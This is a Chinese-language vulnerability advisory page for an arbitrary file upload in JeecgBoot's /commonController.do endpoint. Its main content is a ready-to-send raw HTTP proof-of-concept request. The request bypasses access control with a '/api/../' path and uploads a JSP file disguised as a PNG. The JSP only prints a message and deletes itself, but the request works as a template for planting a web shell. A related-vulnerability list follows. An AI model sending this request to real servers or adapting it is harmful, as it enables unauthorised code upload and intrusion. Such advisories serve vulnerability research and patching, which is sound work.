JeecgBoot /commonController.do 任意文件上传

日期: 2024-04-08 | 影响软件: Jeecg | POC: 已公开

漏洞描述

其中JeecgBoot 存在权限绕过，利用权限绕过可以进行任意文件上传。

PoC代码

POST /api/../commonController.do?parserXml HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate
Content-Length: 463
User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Connection: close

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; "name="name"

zW9YCa.png
------WebKitFormBoundarygcflwtei
ontent-Disposition: form-data; name="documentTitle"

blank
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="zW9YCa.jsp"
Content-Type: image/png

<% out.println("HelloWorld");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarygcflwtei--

漏洞描述

PoC代码

相关漏洞推荐

Jeecgboot /jmreport/save远程代码执行漏洞 无POC

CVE-2021-37304: Jeecg Boot <= 2.4.5 - Information Disclosure POC

CVE-2021-37305: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

Jeecgboot /jmreport/save远程代码执行漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC